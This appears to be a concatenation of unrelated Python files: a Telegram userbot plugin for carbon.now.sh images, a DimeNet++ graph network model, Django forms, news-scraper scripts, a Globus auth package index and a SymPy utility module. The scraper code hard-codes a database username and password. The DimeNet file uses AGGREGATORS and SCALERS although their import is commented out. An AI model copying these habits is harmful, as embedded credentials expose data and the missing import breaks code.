"""A Wrapper for carbon.now.sh"""
drg = await edit_or_reply(event, "🔲🔲🔲🔲🔲")
CARBON = "https://carbon.now.sh/?bg=rgba(249%2C237%2C212%2C0)&t=synthwave-84&wt=none&l=application%2Fjson&ds=true&dsyoff=20px&dsblur=0px&wc=true&wa=true&pv=56px&ph=0px&ln=false&fl=1&fm=IBM%20Plex%20Mono&fs=14.5px&lh=153%25&si=false&es=4x&wm=false&code={code}"
textx = await event.get_reply_message()
pcode = event.text
if pcode[6:]:
pcode = str(pcode[6:])
elif textx:
pcode = str(textx.message)
code = quote_plus(pcode)
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "./"}
chrome_options.add_experimental_option("prefs", prefs)
await drg.edit("🔳🔳🔲🔲🔲")
driver = webdriver.Chrome(
executable_path=Config.CHROME_DRIVER, options=chrome_options
)
driver.get(url)
download_path = "./"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
await asyncio.sleep(1)
await drg.edit("🔳🔳🔳🔲🔲")
await asyncio.sleep(1)
await drg.edit("🔳🔳🔳🔳🔳")
file = "./carbon.png"
await drg.edit("☣️Karbon1 Completed, Uploading Karbon☣️")
await event.client.send_file(
event.chat_id,
file,
force_document=True,
reply_to=event.message.reply_to_msg_id,
)
os.remove("./carbon.png")
await drg.delete()
@drgub.drg_cmd(
pattern="kar2(?:\s|$)([\s\S]*)",
command=("kar2", plugin_category),
info={
"header": "Carbon generators for given text (Fixed style)",
"usage": [
"{tr}kar2 <text>",
"{tr}kar2 <reply to text>",
],
},
)
async def carbon_api(event):
"""A Wrapper for carbon.now.sh"""
drg = await edit_or_reply(event, "📛📛📛📛📛")
CARBON = "https://carbon.now.sh/?bg=rgba(239%2C40%2C44%2C1)&t=one-light&wt=none&l=application%2Ftypescript&ds=true&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Hack&fs=14px&lh=143%25&si=false&es=2x&wm=false&code={code}"
textx = await event.get_reply_message()
pcode = event.text
if pcode[6:]:
pcode = str(pcode[6:])
elif textx:
pcode = str(textx.message)
code = quote_plus(pcode)
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "./"}
chrome_options.add_experimental_option("prefs", prefs)
await drg.edit("🔘🔘📛📛📛")
driver = webdriver.Chrome(
executable_path=Config.CHROME_DRIVER, options=chrome_options
)
driver.get(url)
download_path = "./"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
await asyncio.sleep(1)
await drg.edit("🔘🔘🔘📛📛")
await asyncio.sleep(1)
await drg.edit("🔘🔘🔘🔘🔘")
file = "./carbon.png"
await drg.edit("☣️Karbon2 Completed, Uploading Karbon☣️")
await event.client.send_file(
event.chat_id,
file,
caption=f"Here's your Karbon2",
force_document=True,
reply_to=event.message.reply_to_msg_id,
)
os.remove("./carbon.png")
await drg.delete()
@drgub.drg_cmd(
pattern="kar3(?:\s|$)([\s\S]*)",
command=("kar3", plugin_category),
info={
"header": "Carbon generators for given text (Fixed style)",
"usage": [
"{tr}kar3 <text>",
"{tr}kar3 <reply to text>",
],
},
)
async def carbon_api(event):
"""A Wrapper for carbon.now.sh"""
drg = await edit_or_reply(event, "🎛🎛🎛🎛🎛")
CARBON = "https://carbon.now.sh/?bg=rgba(74%2C144%2C226%2C1)&t=material&wt=none&l=auto&ds=false&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Fira%20Code&fs=14px&lh=152%25&si=false&es=2x&wm=false&code={code}"
textx = await event.get_reply_message()
pcode = event.text
if pcode[6:]:
pcode = str(pcode[6:])
elif textx:
pcode = str(textx.message)
code = quote_plus(pcode)
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "./"}
chrome_options.add_experimental_option("prefs", prefs)
await drg.edit("🔵🔵🎛🎛🎛")
driver = webdriver.Chrome(
executable_path=Config.CHROME_DRIVER, options=chrome_options
)
driver.get(url)
download_path = "./"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
await asyncio.sleep(1)
await drg.edit("🔵🔵🔵🎛🎛")
await asyncio.sleep(1)
await drg.edit("🔵🔵🔵🔵🔵")
file = "./carbon.png"
await drg.edit("☣️Karbon3 Completed, Uploading Karbon⬆️")
await event.client.send_file(
event.chat_id,
file,
caption=f"Here's your Karbon3",
force_document=True,
reply_to=event.message.reply_to_msg_id,
)
os.remove("./carbon.png")
await drg.delete()
@drgub.drg_cmd(
pattern="kar4(?:\s|$)([\s\S]*)",
command=("kar4", plugin_category),
info={
"header": "Carbon generators for given text (Fixed style)",
"usage": [
"{tr}kar4 <text>",
"{tr}kar4 <reply to text>",
],
},
)
async def carbon_api(event):
"""A Wrapper for carbon.now.sh"""
drg = await edit_or_reply(event, "🌚🌚🌚🌚🌚")
CARBON = "https://carbon.now.sh/?bg=rgba(29%2C40%2C104%2C1)&t=one-light&wt=none&l=application%2Ftypescript&ds=true&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Hack&fs=14px&lh=143%25&si=false&es=2x&wm=false&code={code}"
textx = await event.get_reply_message()
pcode = event.text
if pcode[6:]:
pcode = str(pcode[6:])
elif textx:
pcode = str(textx.message)
code = quote_plus(pcode)
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "./"}
chrome_options.add_experimental_option("prefs", prefs)
await drg.edit("🌝🌝🌚🌚🌚")
driver = webdriver.Chrome(
executable_path=Config.CHROME_DRIVER, options=chrome_options
)
driver.get(url)
download_path = "./"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
await asyncio.sleep(1)
await drg.edit("🌝🌝🌝🌚🌚")
await asyncio.sleep(1)
await drg.edit("🌝🌝🌝🌝🌝")
file = "./carbon.png"
await drg.edit("✅Karbon4 Completed, Uploading Karbon✅")
await event.client.send_file(
event.chat_id,
file,
caption=f"Here's your Karbon4 ",
force_document=True,
reply_to=event.message.reply_to_msg_id,
)
os.remove("./carbon.png")
await drg.delete()
@drgub.drg_cmd(
pattern="kargb(?:\s|$)([\s\S]*)",
command=("kargb", plugin_category),
info={
"header": "Carbon generators for given text (random from some selected themes)",
"usage": [
"{tr}kargb <text>",
"{tr}kargb <reply to text>",
],
},
)
async def carbon_api(event):
"""A Wrapper for carbon.now.sh"""
RED = random.randint(0, 256)
GREEN = random.randint(0, 256)
BLUE = random.randint(0, 256)
THEME = [
"3024-night",
"a11y-dark",
"blackboard",
"base16-dark",
"base16-light",
"cobalt",
"dracula",
"duotone-dark",
"hopscotch",
"lucario",
"material",
"monokai",
"night-owl",
"nord",
"oceanic-next",
"one-light",
"one-dark",
"panda-syntax",
"paraiso-dark",
"seti",
"shades-of-purple",
"solarized",
"solarized%20light",
"synthwave-84",
"twilight",
"verminal",
"vscode",
"yeti",
"zenburn",
]
CUNTHE = random.randint(0, len(THEME) - 1)
The = THEME[CUNTHE]
drg = await edit_or_reply(event, "⬜⬜⬜⬜⬜")
CARBON = "https://carbon.now.sh/?bg=rgba({R}%2C{G}%2C{B}%2C1)&t={T}&wt=none&l=auto&ds=false&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Fira%20Code&fs=14px&lh=152%25&si=false&es=2x&wm=false&code={code}"
textx = await event.get_reply_message()
pcode = event.text
if pcode[7:]:
pcode = str(pcode[7:])
elif textx:
pcode = str(textx.message)
code = quote_plus(pcode)
url = CARBON.format(code=code, R=RED, G=GREEN, B=BLUE, T=The, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CHROME_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-gpu")
prefs = {"download.default_directory": "./"}
chrome_options.add_experimental_option("prefs", prefs)
await drg.edit("⬛⬛⬜⬜⬜")
driver = webdriver.Chrome(
executable_path=Config.CHROME_DRIVER, options=chrome_options
)
driver.get(url)
download_path = "./"
driver.command_executor._commands["send_command"] = (
"POST",
"/session/$sessionId/chromium/send_command",
)
params = {
"cmd": "Page.setDownloadBehavior",
"params": {"behavior": "allow", "downloadPath": download_path},
}
driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
await asyncio.sleep(1)
await drg.edit("⬛⬛⬛⬜⬜")
await asyncio.sleep(1)
await drg.edit("⬛⬛⬛⬛⬛")
file = "./carbon.png"
await drg.edit("✅RGB Karbon Completed, Uploading Karbon✅")
await event.client.send_file(
event.chat_id,
file,
caption=f"Here's your karbonrgb",
force_document=True,
reply_to=event.message.reply_to_msg_id,
)
os.remove("./carbon.png")
await drg.delete()
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
---
This code borrows heavily from the DimeNet implementation as part of
pytorch-geometric: https://github.com/rusty1s/pytorch_geometric. License:
---
Copyright (c) 2020 Matthias Fey <matthias.fey@tu-dortmund.de>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import torch
from torch import nn
from torch_geometric.nn import radius_graph
from torch_geometric.nn.acts import swish
from torch_geometric.nn.inits import glorot_orthogonal
from torch_geometric.nn.models.dimenet import (
BesselBasisLayer,
EmbeddingBlock,
Envelope,
ResidualLayer,
SphericalBasisLayer,
)
from torch_geometric.utils import degree
from torch_scatter import scatter
from torch_sparse import SparseTensor
from ocpmodels.common.registry import registry
from ocpmodels.common.utils import (
conditional_grad,
get_pbc_distances,
radius_graph_pbc,
)
#from ocpmodels.models.utils.pna import AGGREGATORS, SCALERS
try:
import sympy as sym
except ImportError:
sym = None
class InteractionPPBlock(torch.nn.Module):
def __init__(
self,
hidden_channels,
int_emb_size,
basis_emb_size,
num_spherical,
num_radial,
num_before_skip,
num_after_skip,
act=swish,
):
super(InteractionPPBlock, self).__init__()
self.act = act
# Transformations of Bessel and spherical basis representations.
self.lin_rbf1 = nn.Linear(num_radial, basis_emb_size, bias=False)
self.lin_rbf2 = nn.Linear(basis_emb_size, hidden_channels, bias=False)
self.lin_sbf1 = nn.Linear(
num_spherical * num_radial, basis_emb_size, bias=False
)
self.lin_sbf2 = nn.Linear(basis_emb_size, int_emb_size, bias=False)
# Dense transformations of input messages.
self.lin_kj = nn.Linear(hidden_channels, hidden_channels)
self.lin_ji = nn.Linear(hidden_channels, hidden_channels)
# Embedding projections for interaction triplets.
self.lin_down = nn.Linear(hidden_channels, int_emb_size, bias=False)
self.lin_up = nn.Linear(int_emb_size, hidden_channels, bias=False)
# Residual layers before and after skip connection.
self.layers_before_skip = torch.nn.ModuleList(
[
ResidualLayer(hidden_channels, act)
for _ in range(num_before_skip)
]
)
self.lin = nn.Linear(hidden_channels, hidden_channels)
self.layers_after_skip = torch.nn.ModuleList(
[
ResidualLayer(hidden_channels, act)
for _ in range(num_after_skip)
]
)
self.reset_parameters()
def reset_parameters(self):
glorot_orthogonal(self.lin_rbf1.weight, scale=2.0)
glorot_orthogonal(self.lin_rbf2.weight, scale=2.0)
glorot_orthogonal(self.lin_sbf1.weight, scale=2.0)
glorot_orthogonal(self.lin_sbf2.weight, scale=2.0)
glorot_orthogonal(self.lin_kj.weight, scale=2.0)
self.lin_kj.bias.data.fill_(0)
glorot_orthogonal(self.lin_ji.weight, scale=2.0)
self.lin_ji.bias.data.fill_(0)
glorot_orthogonal(self.lin_down.weight, scale=2.0)
glorot_orthogonal(self.lin_up.weight, scale=2.0)
for res_layer in self.layers_before_skip:
res_layer.reset_parameters()
glorot_orthogonal(self.lin.weight, scale=2.0)
self.lin.bias.data.fill_(0)
for res_layer in self.layers_after_skip:
res_layer.reset_parameters()
def forward(self, x, rbf, sbf, idx_kj, idx_ji):
# Initial transformations.
x_ji = self.act(self.lin_ji(x))
x_kj = self.act(self.lin_kj(x))
# Transformation via Bessel basis.
rbf = self.lin_rbf1(rbf)
rbf = self.lin_rbf2(rbf)
x_kj = x_kj * rbf
# Down-project embeddings and generate interaction triplet embeddings.
x_kj = self.act(self.lin_down(x_kj))
# Transform via 2D spherical basis.
sbf = self.lin_sbf1(sbf)
sbf = self.lin_sbf2(sbf)
x_kj = x_kj[idx_kj] * sbf
# Aggregate interactions and up-project embeddings.
x_kj = scatter(x_kj, idx_ji, dim=0, dim_size=x.size(0))
x_kj = self.act(self.lin_up(x_kj))
h = x_ji + x_kj
for layer in self.layers_before_skip:
h = layer(h)
h = self.act(self.lin(h)) + x
for layer in self.layers_after_skip:
h = layer(h)
return h
class OutputPPBlock(torch.nn.Module):
def __init__(
self,
num_radial,
hidden_channels,
out_emb_channels,
out_channels,
num_layers,
act,
aggregators,
scalers,
):
super(OutputPPBlock, self).__init__()
self.act = act
self.pna = False
if aggregators and scalers:
self.pna = True
self.aggregators = [AGGREGATORS[aggr] for aggr in aggregators]
self.scalers = [SCALERS[scale] for scale in scalers]
# average degree computed from data
self.avg_deg = {"lin": 33.53, "log": 3.47}
self.aggr_down = nn.Linear(
len(aggregators) * len(scalers) * hidden_channels,
out_emb_channels,
bias=True,
)
else:
self.lin_up = nn.Linear(
hidden_channels, out_emb_channels, bias=True
)
self.lin_rbf = nn.Linear(num_radial, hidden_channels, bias=False)
self.lins = torch.nn.ModuleList()
for _ in range(num_layers):
self.lins.append(nn.Linear(out_emb_channels, out_emb_channels))
self.lin = nn.Linear(out_emb_channels, out_channels, bias=False)
self.reset_parameters()
def reset_parameters(self):
glorot_orthogonal(self.lin_rbf.weight, scale=2.0)
if not self.pna:
glorot_orthogonal(self.lin_up.weight, scale=2.0)
for lin in self.lins:
glorot_orthogonal(lin.weight, scale=2.0)
lin.bias.data.fill_(0)
self.lin.weight.data.fill_(0)
def forward(self, x, rbf, i, num_nodes=None):
x = self.lin_rbf(rbf) * x
if self.pna:
outs = [
aggr(x, i, dim_size=num_nodes) for aggr in self.aggregators
]
out = torch.cat(outs, dim=-1)
deg = degree(i, num_nodes, dtype=x.dtype).view(-1, 1)
outs = [scaler(out, deg, self.avg_deg) for scaler in self.scalers]
x = torch.cat(outs, dim=-1)
x = self.aggr_down(x)
else:
x = scatter(x, i, dim=0, dim_size=num_nodes)
x = self.lin_up(x)
for lin in self.lins:
x = self.act(lin(x))
return self.lin(x)
class DimeNetPlusPlus(torch.nn.Module):
r"""DimeNet++ implementation based on https://github.com/klicperajo/dimenet.
Args:
hidden_channels (int): Hidden embedding size.
out_channels (int): Size of each output sample.
num_blocks (int): Number of building blocks.
int_emb_size (int): Embedding size used for interaction triplets
basis_emb_size (int): Embedding size used in the basis transformation
out_emb_channels(int): Embedding size used for atoms in the output block
num_spherical (int): Number of spherical harmonics.
num_radial (int): Number of radial basis functions.
cutoff: (float, optional): Cutoff distance for interatomic
interactions. (default: :obj:`5.0`)
envelope_exponent (int, optional): Shape of the smooth cutoff.
(default: :obj:`5`)
num_before_skip: (int, optional): Number of residual layers in the
interaction blocks before the skip connection. (default: :obj:`1`)
num_after_skip: (int, optional): Number of residual layers in the
interaction blocks after the skip connection. (default: :obj:`2`)
num_output_layers: (int, optional): Number of linear layers for the
output blocks. (default: :obj:`3`)
act: (function, optional): The activation funtion.
(default: :obj:`swish`)
"""
url = "https://github.com/klicperajo/dimenet/raw/master/pretrained"
def __init__(
self,
hidden_channels,
out_channels,
num_blocks,
int_emb_size,
basis_emb_size,
out_emb_channels,
num_spherical,
num_radial,
cutoff=5.0,
envelope_exponent=5,
num_before_skip=1,
num_after_skip=2,
num_output_layers=3,
act=swish,
aggregators=None,
scalers=None,
):
super(DimeNetPlusPlus, self).__init__()
self.cutoff = cutoff
if sym is None:
raise ImportError("Package `sympy` could not be found.")
self.num_blocks = num_blocks
self.rbf = BesselBasisLayer(num_radial, cutoff, envelope_exponent)
self.sbf = SphericalBasisLayer(
num_spherical, num_radial, cutoff, envelope_exponent
)
self.emb = EmbeddingBlock(num_radial, hidden_channels, act)
self.output_blocks = torch.nn.ModuleList(
[
OutputPPBlock(
num_radial,
hidden_channels,
out_emb_channels,
out_channels,
num_output_layers,
act,
aggregators,
scalers,
)
for _ in range(num_blocks + 1)
]
)
self.interaction_blocks = torch.nn.ModuleList(
[
InteractionPPBlock(
hidden_channels,
int_emb_size,
basis_emb_size,
num_spherical,
num_radial,
num_before_skip,
num_after_skip,
act,
)
for _ in range(num_blocks)
]
)
self.reset_parameters()
def reset_parameters(self):
self.rbf.reset_parameters()
self.emb.reset_parameters()
for out in self.output_blocks:
out.reset_parameters()
for interaction in self.interaction_blocks:
interaction.reset_parameters()
def triplets(self, edge_index, num_nodes):
row, col = edge_index # j->i
value = torch.arange(row.size(0), device=row.device)
adj_t = SparseTensor(
row=col, col=row, value=value, sparse_sizes=(num_nodes, num_nodes)
)
adj_t_row = adj_t[row]
num_triplets = adj_t_row.set_value(None).sum(dim=1).to(torch.long)
# Node indices (k->j->i) for triplets.
idx_i = col.repeat_interleave(num_triplets)
idx_j = row.repeat_interleave(num_triplets)
idx_k = adj_t_row.storage.col()
mask = idx_i != idx_k # Remove i == k triplets.
idx_i, idx_j, idx_k = idx_i[mask], idx_j[mask], idx_k[mask]
# Edge indices (k-j, j->i) for triplets.
idx_kj = adj_t_row.storage.value()[mask]
idx_ji = adj_t_row.storage.row()[mask]
return col, row, idx_i, idx_j, idx_k, idx_kj, idx_ji
def forward(self, z, pos, batch=None):
""""""
raise NotImplementedError
@registry.register_model("dimenetplusplus")
class DimeNetPlusPlusWrap(DimeNetPlusPlus):
def __init__(
self,
num_atoms,
bond_feat_dim, # not used
num_targets,
use_pbc=True,
regress_forces=True,
regress_position=False,
hidden_channels=128,
num_blocks=4,
int_emb_size=64,
basis_emb_size=8,
out_emb_channels=256,
num_spherical=7,
num_radial=6,
otf_graph=False,
cutoff=10.0,
envelope_exponent=5,
num_before_skip=1,
num_after_skip=2,
num_output_layers=3,
aggregators=None,
scalers=None,
):
self.regress_position = regress_position
if self.regress_position:
self.num_targets = 3
else:
self.num_targets = num_targets
self.regress_forces = regress_forces
self.use_pbc = use_pbc
self.cutoff = cutoff
self.otf_graph = otf_graph
super(DimeNetPlusPlusWrap, self).__init__(
hidden_channels=hidden_channels,
out_channels=self.num_targets,
num_blocks=num_blocks,
int_emb_size=int_emb_size,
basis_emb_size=basis_emb_size,
out_emb_channels=out_emb_channels,
num_spherical=num_spherical,
num_radial=num_radial,
cutoff=cutoff,
envelope_exponent=envelope_exponent,
num_before_skip=num_before_skip,
num_after_skip=num_after_skip,
num_output_layers=num_output_layers,
aggregators=aggregators,
scalers=scalers,
)
@conditional_grad(torch.enable_grad())
def _forward(self, data):
pos = data.pos
batch = data.batch
if self.otf_graph:
edge_index, cell_offsets, neighbors = radius_graph_pbc(
data, self.cutoff, 50, data.pos.device
)
data.edge_index = edge_index
data.cell_offsets = cell_offsets
data.neighbors = neighbors
if self.use_pbc:
out = get_pbc_distances(
pos,
data.edge_index,
data.cell,
data.cell_offsets,
data.neighbors,
return_offsets=True,
)
edge_index = out["edge_index"]
dist = out["distances"]
offsets = out["offsets"]
j, i = edge_index
else:
edge_index = radius_graph(pos, r=self.cutoff, batch=batch)
j, i = edge_index
dist = (pos[i] - pos[j]).pow(2).sum(dim=-1).sqrt()
_, _, idx_i, idx_j, idx_k, idx_kj, idx_ji = self.triplets(
edge_index, num_nodes=data.atomic_numbers.size(0)
)
# Calculate angles.
pos_i = pos[idx_i].detach()
pos_j = pos[idx_j].detach()
if self.use_pbc:
pos_ji, pos_kj = (
pos[idx_j].detach() - pos_i + offsets[idx_ji],
pos[idx_k].detach() - pos_j + offsets[idx_kj],
)
else:
pos_ji, pos_kj = (
pos[idx_j].detach() - pos_i,
pos[idx_k].detach() - pos_j,
)
a = (pos_ji * pos_kj).sum(dim=-1)
b = torch.cross(pos_ji, pos_kj).norm(dim=-1)
angle = torch.atan2(b, a)
rbf = self.rbf(dist)
sbf = self.sbf(dist, angle, idx_kj)
# Embedding block.
x = self.emb(data.atomic_numbers.long(), rbf, i, j)
P = self.output_blocks[0](x, rbf, i, num_nodes=pos.size(0))
# Interaction blocks.
for interaction_block, output_block in zip(
self.interaction_blocks, self.output_blocks[1:]
):
x = interaction_block(x, rbf, sbf, idx_kj, idx_ji)
P += output_block(x, rbf, i, num_nodes=pos.size(0))
energy = (
P.sum(dim=0)
if data.batch is None
else scatter(P, data.batch, dim=0)
)
return P, energy
def forward(self, data):
if self.regress_forces:
data.pos.requires_grad_(True)
P, energy = self._forward(data)
if self.regress_forces:
forces = -1 * (
torch.autograd.grad(
energy,
data.pos,
grad_outputs=torch.ones_like(energy),
create_graph=True,
)[0]
)
return energy, forces
elif self.regress_position:
return P
else:
return energy
@property
def num_params(self):
return sum(p.numel() for p in self.parameters())
|
# Review class
from django import forms
from django.contrib.auth.models import User
from core.models import UserProfile
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput())
class Meta:
model = User
fields = ('username', 'email', 'password',)
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ('profile_pic',)
|
#!/usr/bin/python3
__version__ = 3
__all__ = ['event_download_netease_news', 'event_record_announce_url', ]
def event_download_netease_news():
from libmysql_utils.mysql8 import mysqlHeader
from dev_global.env import SOFT_PATH
from taurus.news_downloader import neteaseNewsSpider
header = mysqlHeader('stock', 'stock2020', 'natural_language')
event = neteaseNewsSpider(header, SOFT_PATH)
event.generate_url_list()
for url in event.url_list:
event.extract_href(url)
event.save_process()
# hfile = SOFT_PATH + 'config/HREF_LIST'
# event.load_href_file(hfile)
for url in event.href:
art = event.extract_article(url)
event.record_article(art)
def event_record_announce_url():
from polaris.mysql8 import mysqlHeader, GLOBAL_HEADER
from venus.stock_base import StockEventBase
from taurus.announcement import cninfoAnnounce
event_stock_list = StockEventBase(GLOBAL_HEADER)
stock_list = event_stock_list.get_all_stock_list()
mysql_header = mysqlHeader('stock', 'stock2020', 'natural_language')
event = cninfoAnnounce(mysql_header)
event._set_param()
for stock in stock_list:
event.run(stock)
def event_record_sina_news_url():
from taurus.news_downloader import SinaNewsSpider
from polaris.mysql8 import NLP_HEADER
import time
import random
# NLP_HEADER = mysqlHeader('stock', 'stock2020', 'natural_language')
event = SinaNewsSpider(NLP_HEADER, '')
i = 49444
event.start_url(i)
for url in event.url_list:
hrefs = event.extract_href(url)
for href in hrefs:
# print(href)
try:
event.record_url(href)
except Exception:
pass
time.sleep(random.randint(5, 10))
with open('/home/friederich/Documents/spider/count', 'a') as f:
f.write(f"Page: <{str(i)}> contains {len(hrefs)} urls.\n")
i += 1
def event_download_news(n):
from mars.network import delay
from polaris.mysql8 import mysqlHeader
from taurus.news_downloader import newsSpider
header = mysqlHeader('stock', 'stock2020', 'natural_language')
event = newsSpider(header)
url_list = event.get_url_list()
for url in url_list[:n]:
try:
event.save_page(url)
delay(5)
except Exception as e:
print(url)
print(e)
if __name__ == "__main__":
# event_download_news(15000)
event_record_sina_news_url()
|
from .client import AuthClient, ConfidentialAppAuthClient, NativeAppAuthClient
from .errors import AuthAPIError
from .flow_managers import (
GlobusAuthorizationCodeFlowManager,
GlobusNativeAppFlowManager,
)
from .identity_map import IdentityMap
from .response import OAuthDependentTokenResponse, OAuthTokenResponse
__all__ = [
"AuthClient",
"AuthAPIError",
"NativeAppAuthClient",
"ConfidentialAppAuthClient",
"IdentityMap",
"GlobusNativeAppFlowManager",
"GlobusAuthorizationCodeFlowManager",
"OAuthDependentTokenResponse",
"OAuthTokenResponse",
]
|
# sympy/galgebra/ncutil.py
"""
ncutil.py contains all the needed utility functions that only depend on
SymPy and that are required for the expansion and manipulation of linear
combinations of noncommutative SymPy symbols.
also contains "half_angle_reduce" which is probably not needed any more
due to the improvements in trigsimp.
"""
from sympy import expand, Mul, Add, Symbol, S, Pow, diff, trigsimp, \
simplify, sin, cos, symbols
try:
from numpy import matrix
numpy_loaded = True
except ImportError:
numpy_loaded = False
ONE_NC = Symbol('ONE', commutative=False)
def get_commutative_coef(expr):
if isinstance(expr, Mul):
(coefs, bases) = expr.args_cnc()
return Mul(*coefs)
return S.One
def half_angle_reduce(expr, theta):
s, c = symbols('s c')
sub_dict = {sin(theta / 2): s, cos(theta / 2): c}
new_expr = expr.subs(sub_dict)
sub_dict = {s * c: sin(theta) / 2, s**2: (1 - cos(theta)) / 2, c**2: (1 + cos(theta)) / 2}
# print new_expr
new_expr = trigsimp(simplify(new_expr.subs(sub_dict)), recursive=True)
# print expand(new_expr)
return new_expr
def linear_expand(expr):
"""
If a sympy 'Expr' is of the form:
expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
where all the a_j are noncommuting symbols in basis then
(expr_0, ..., expr_n) and (1, a_1, ..., a_n) are returned. Note that
expr_j*a_j does not have to be of that form, but rather can be any
Mul with a_j as a factor (it doen not have to be a postmultiplier).
expr_0 is the scalar part of the expression.
"""
expr = expand(expr)
if expr.is_commutative: # commutative expr only contains expr_0
return (expr, ), (S.One, )
if isinstance(expr, Mul): # expr only contains one term
(coefs, bases) = expr.args_cnc()
coefs = Mul(*coefs)
bases = bases[0]
elif isinstance(expr, Symbol): # term is Symbol
coefs = S.One
bases = expr
elif isinstance(expr, Add): # expr has multiple terms
coefs = []
bases = []
for arg in expr.args:
term = arg.args_cnc()
coef = Mul(*term[0])
base = term[1][0]
if base in bases: # increment coefficient of base
ibase = list(bases).index(base) # Python 2.5
coefs[ibase] += coef
else: # add base to list
coefs.append(coef)
bases.append(base)
else:
raise NotImplementedError("linear_expand for type %s" % type(expr))
if not isinstance(coefs, list): # convert single coef to list
coefs = [coefs]
if not isinstance(bases, list): # convert single base to list
bases = [bases]
coefs = tuple(coefs)
bases = tuple(bases)
return coefs, bases
def linear_projection(expr, plist=None):
"""
If a sympy 'Expr' is of the form:
expr = expr_0 + expr_1*a_1 + ... + expr_n*a_n
where all the a_j are noncommuting symbols in basis then
proj(expr) returns the sum of those terms where a_j is in plist
"""
if expr.is_commutative and plist is None: # return scalar projection
return expr
expr = expand(expr)
if isinstance(expr, Mul): # expr has single term
(coefs, bases) = expr.args_cnc()
if bases[0] in plist: # vector term to be projected
return Mul(*coefs) * bases[0]
else:
return S.Zero
elif isinstance(expr, Symbol): # base vector to be projected
if expr in plist:
return expr
else:
return S.Zero
elif isinstance(expr, Add): # expr has multiple terms
result = S.Zero
for arg in expr.args:
term = arg.args_cnc()
if term[1] == [] and plist is None: # scalar term to be projected
result += Mul(*term[0])
elif term[1] != [] and plist is not None and term[1][0] in plist: # vector term to be projected
result += Mul(*term[0]) * term[1][0]
return result
def non_scalar_projection(expr):
"""
If a sympy 'Expr' is of the form:
expr = expr_0*S.One + expr_1*a_1 + ... + expr_n*a_n
where all the a_j are noncommuting symbols in basis then
proj(expr) returns the sum of those terms where a_j is in plist
"""
if expr.is_commutative: # return scalar projection
return S.Zero
expr = expand(expr)
